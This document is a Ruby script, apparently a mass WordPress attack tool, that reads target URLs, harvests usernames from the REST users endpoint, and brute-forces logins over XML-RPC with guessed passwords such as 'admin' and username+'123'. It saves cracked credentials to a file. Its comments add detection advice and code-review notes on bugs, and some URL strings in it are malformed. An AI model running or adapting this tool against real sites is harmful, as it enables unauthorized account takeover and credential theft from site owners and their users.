require 'net/http'
require 'uri'
require 'optparse'
require 'eventmachine'
require 'json'
# Command-line tool that, for each URL read from an input file, fetches the
# WordPress REST users listing (`/?rest_route=/wp/v2/users`) and then posts
# `wp.getUsersBlogs` XML-RPC calls to `/xmlrpc.php` using a small fixed
# password list. Results are printed to the console (coloured via the String
# helpers defined later in this file) and hits are appended to
# @params[:output_file].
#
# Defender notes, derived only from the requests this class sends:
#   - The observable pattern is a GET to `/?rest_route=/wp/v2/users` followed
#     by repeated POSTs to `/xmlrpc.php` whose body contains `wp.getUsersBlogs`,
#     all from one client. Disabling XML-RPC (or that method) and restricting
#     the public users endpoint removes both things this class depends on.
#   - The User-Agent below is misspelled ("Mozlila", "Bulid", "Moblie"), which
#     makes it a straightforward log / WAF signature.
class XMLRPC_WP
  # Sets up the fixed request headers, the CLI defaults and the worker list.
  def initialize
    @headers = {
      'Connection' => 'keep-alive',
      # Sent verbatim on every request; note the misspellings (see class note).
      'User-Agent' => 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
      'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
      'referer' => 'www.google.com'
    }
    # CLI parameters: :input_file must be set by #parser_options for #main to do
    # anything; :output_file is the append-only hit log written by #log_checker.
    @params = {
      input_file: nil,
      output_file: 'output.txt'
    }
    # One Thread per group of 20 input lines, created in #main.
    @threads = []
  end

  # Runs the check against one base URL.
  #
  # Flow as written: GET `/?rest_route=/wp/v2/users`; if the body mentions
  # 'gravatar.com', parse it as JSON and take each entry's 'name'; for every
  # name, POST a `wp.getUsersBlogs` call to `/xmlrpc.php` once per entry of
  # `pass`, treating a body containing 'blogName' as a hit and passing it to
  # #log_checker. The `return` on the first non-hit leaves the method entirely,
  # so remaining candidates for that name, and all later names, are skipped.
  #
  # @param url_exploit [String] base URL taken from one input line
  # @return [nil] all reporting is done via puts and #log_checker
  #
  # NOTE(review): in both rescue chains `rescue StandardError` comes before
  # `rescue Net::OpenTimeout, Net::ReadTimeout`; both timeout classes are
  # StandardError subclasses, so the second clause can never run. The two
  # clauses print the same message, so nothing changes at runtime, but the
  # second clause is dead code and should be dropped.
  def exploit(url_exploit)
    begin
      url = URI.parse(url_exploit)
      http = Net::HTTP.new(url.host, url.port)
      http.use_ssl = (url.scheme == "https")
      request = Net::HTTP::Get.new("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users", @headers)
      response_exploit = http.request(request)
      # 'gravatar.com' in the body is used as the signal that a user list came back.
      if response_exploit.body.include?('gravatar.com')
        usernames = JSON.parse(response_exploit.body).map { |user| user['name'] }
        if usernames.any?
          usernames.each do |username|
            # Fixed candidate list: four variants of the name plus four static words.
            pass = [
              username + username, username, username + '123', username + '1234', "admin", "root", "password", "pass"
            ]
            pass.each do |password|
              # `<<-` keeps the body lines' leading whitespace as part of the payload;
              # only the terminator may be indented.
              xmlrpc_payload = <<-XMLRPC
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>#{username}</value></param>
<param><value>#{password}</value></param>
</params>
</methodCall>
              XMLRPC
              begin
                request = Net::HTTP::Post.new("#{url.scheme}:https://#{url.host}/xmlrpc.php", @headers)
                request.body = xmlrpc_payload
                post_load = http.request(request)
                # 'blogName' in the response body is treated as the success marker.
                if post_load.body.include?('blogName')
                  puts("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users --> Users Found".green)
                  log_checker(url_exploit, username, password)
                else
                  puts("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users --> Not Vuln: (blogName Not Found)".red)
                  # `return` inside a block returns from #exploit, not just from this iteration.
                  return
                end
              rescue StandardError => err
                puts("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users --> Not Vuln: #{err}".red)
              rescue Net::OpenTimeout, Net::ReadTimeout => err
                # Unreachable: both are StandardError subclasses (see method note).
                puts("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users --> Not Vuln: #{err}".red)
              end
            end
          end
        else
          puts("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users --> Not Vuln (Username Not Found)".red)
        end
      else
        puts("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users --> Not Vuln (Gravatar Not Found)".red)
        return
      end
    rescue StandardError => err
      puts("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users --> Not Vuln: #{err}".red)
    rescue Net::OpenTimeout, Net::ReadTimeout => err
      # Unreachable for the same reason as the inner clause (see method note).
      puts("#{url.scheme}:https://#{url.host}/?rest_route=/wp/v2/users --> Not Vuln: #{err}".red)
    end
  end

  # Re-checks one (user, password) pair by POSTing it as form data to
  # `/xmlrpc.php` and, on a 302 whose Location header contains 'admin',
  # appends a line to @params[:output_file]; any other outcome prints "Not Vuln".
  #
  # @param url_check [String] the same base URL passed to #exploit
  # @param user [String]
  # @param password [String]
  # @return [nil]
  #
  # NOTE(review): unlike #exploit this method has no rescue, so a network or
  # parse error here propagates to the caller's `rescue StandardError`.
  # The output file stores the pair in plaintext; it must be protected like any
  # other credential material, and the 'a+' open here is per call, so the file
  # is reopened for every confirmed pair.
  def log_checker(url_check, user, password)
    url = URI.parse(url_check)
    url.path = "/xmlrpc.php"
    http = Net::HTTP.new(url.host, url.port)
    http.use_ssl = (url.scheme == "https")
    # Note: this request does not carry @headers, unlike those in #exploit.
    request = Net::HTTP::Post.new(url.path)
    request.set_form_data(
      'log' => user,
      'pwd' => password,
      'wp-submit' => 'Log In',
    )
    request['Cookie'] = 'testcookie=1'
    response = http.request(request)
    if response.code == '302'
      # A redirect is only counted when its target mentions 'admin'; a 302
      # elsewhere falls through silently (no message is printed for it).
      if response['location'].include?('admin')
        File.open(@params[:output_file], "a+") do |file|
          file.puts("#{url.scheme}:https://#{url.host}/wp-login.php##{user}@#{password}")
        end
      end
    else
      puts("#{url.scheme}:https://#{url.host}/xmlrpc.php --> Not Vuln".red)
    end
  end

  # Prints the CLI usage text in magenta.
  #
  # NOTE(review): the usage line names `exploit.rb`, while this file is listed
  # as xmlrpc.rb; the text is a runtime string, so it is left as is here.
  def print_help
    help_text = <<-'HELP_TEXT'
USAGE: ruby exploit.rb [options]
OPTIONS:
-i, --input_file INPUT_FILE: Define the path to the URL file.
-o, --output_file OUTPUT_FILE: Define the name of the output log file.
    HELP_TEXT
    puts(help_text.magenta)
  end

  # Runs #exploit on each line of one input slice (whitespace stripped).
  # Blank lines are not filtered, so an empty line reaches #exploit as "".
  #
  # @param lines [Array<String>] raw lines from the input file
  # @return [Array<String>] the input array (Enumerable#each), unused by callers
  def parse_lines(lines)
    lines.each do |line|
      exploit(line.strip)
    end
  end

  # Parses ARGV into @params. -i is validated with File.exist?; -o is taken as
  # given.
  #
  # NOTE(review): `rescue Exception` is too broad. It also catches the
  # SystemExit raised by `exit(1)` above, so a missing input file prints
  # "Error: exit" and execution continues into #main (which then prints the
  # help text instead of terminating). Rescuing `OptionParser::ParseError`
  # would keep the intended exit and still report bad options.
  def parser_options
    begin
      OptionParser.new do |parser|
        parser.on("-i", "--input_file INPUT_FILE") do |input_file|
          if File.exist?(input_file)
            @params[:input_file] = input_file
          else
            STDERR.puts("Not Found: #{input_file}".red)
            exit(1)
          end
        end
        parser.on("-o", "--output_file OUTPUT_FILE") do |output_file|
          @params[:output_file] = output_file
        end
      end.parse!
    rescue Exception => err_parser
      STDERR.puts("Error: #{err_parser}")
    end
  end

  # Entry point called from the EM.run block at the bottom of the file.
  # Reads the whole input file, hands it to worker threads in slices of 20
  # lines, waits for them, then stops the EventMachine reactor. With no input
  # file it prints the help text and stops the reactor.
  #
  # NOTE(review): in the rescue clause `EM.stop` follows `return` and so never
  # runs; any StandardError here (e.g. File.readlines failing) is swallowed
  # silently and the reactor is left running, so the process does not exit.
  # Moving `EM.stop` into an `ensure` (or before the return) would fix both.
  def main
    begin
      unless @params[:input_file].nil?
        lines = File.readlines(@params[:input_file])
        lines.each_slice(20) do |line_group|
          @threads << Thread.new{parse_lines(line_group)}
        end
        @threads.each(&:join)
        puts("Exploit Completed".magenta)
        EM.stop
      else
        print_help
        EM.stop
      end
    rescue StandardError
      return
      # Unreachable: placed after `return` (see method note).
      EM.stop
    end
  end
end
# Console colour helpers added directly to String. Each wraps the receiver in
# an ANSI SGR colour sequence followed by the reset sequence.
class String
  # @return [String] the receiver wrapped in red (SGR 31)
  def red
    format("\e[%dm%s\e[0m", 31, self)
  end

  # @return [String] the receiver wrapped in green (SGR 32)
  def green
    format("\e[%dm%s\e[0m", 32, self)
  end

  # @return [String] the receiver wrapped in magenta (SGR 35)
  def magenta
    format("\e[%dm%s\e[0m", 35, self)
  end
end
# Script entry point: start the EventMachine reactor, then parse the CLI
# options and run the main loop on a single XMLRPC_WP instance. The instance
# is responsible for calling EM.stop when it finishes.
EM.run { XMLRPC_WP.new.tap(&:parser_options).main }